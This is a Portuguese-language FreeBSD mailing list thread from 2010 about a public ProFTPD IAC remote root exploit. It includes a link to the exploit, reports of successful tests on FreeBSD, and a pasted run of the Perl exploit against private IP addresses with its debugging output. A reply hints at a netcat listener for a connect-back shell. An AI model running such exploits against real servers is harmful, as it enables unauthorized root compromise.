[FUG-BR] ProFTPD IAC Remote Root Exploit
Oscar Marques
oscarbm em gmail.com
Quarta Novembro 10 17:08:12 BRST 2010
Voce abriu netcat pra escutar na porta 45... alguma coisa?
2010/11/10 Erick Rodrigo <erick.lzr em gmail.com>
> Boa tarde Srs.
>
> Executei no CentOS 5.5 ProFTP 1.3.2 (stable), não rolou...
>
>
> erick em erick-desktop:~/Sistemas/exploits/proftp$ perl 15449.pl10.100.100.107
> 10.100.100.152 12
> [10.100.100.107] CentOS 5, ProFTPD 1.3.2e Server (Plesk binary) :pP
> align = 8189
> Seeking for write(2)..
> Using write offset 0804c290.
> Can't call method "sockopt" on an undefined value at 15449.pl line 255.
>
>
> Em 8 de novembro de 2010 02:54, Leonardo Rota Botelho <
> leonardobotelho em gmail.com> escreveu:
>
> > Boa noite/dia,
> >
> > Para quem não viu ainda...
> >
> > ProFTPD IAC Remote Root Exploit
> > http://www.exploit-db.com/exploits/15449/
> >
> > Testei com...
> > FreeBSD 8.1 i386, ProFTPD 1.3.3a
> > FreeBSD 8.0 i386, ProFTPD 1.3.2a
> >
> > como descrevia o exploit.
> >
> >
> >
> http://www.leonardobotelho.com/blog/2010/11/proftpd-iac-remote-root-exploit/
> >
> >
> >
> > abs!
> >
> >
> > --
> > Leonardo Rota Botelho
> > http://www.leonardobotelho.com/blog/
> > public key: http://www.leonardobotelho.com/leonardorotabotelho.gpg
> > -------------------------
> > Histórico: http://www.fug.com.br/historico/html/freebsd/
> > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
> >
>
>
>
> --
> Linux user: 478061
> Google Talk : erick.lzr em gmail.com
> MSN : erickrl em msn.com
> Skype: erick.lzr
> Erick Rodrigo Lazaro
> -------------------------
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
Mais detalhes sobre a lista de discussão freebsd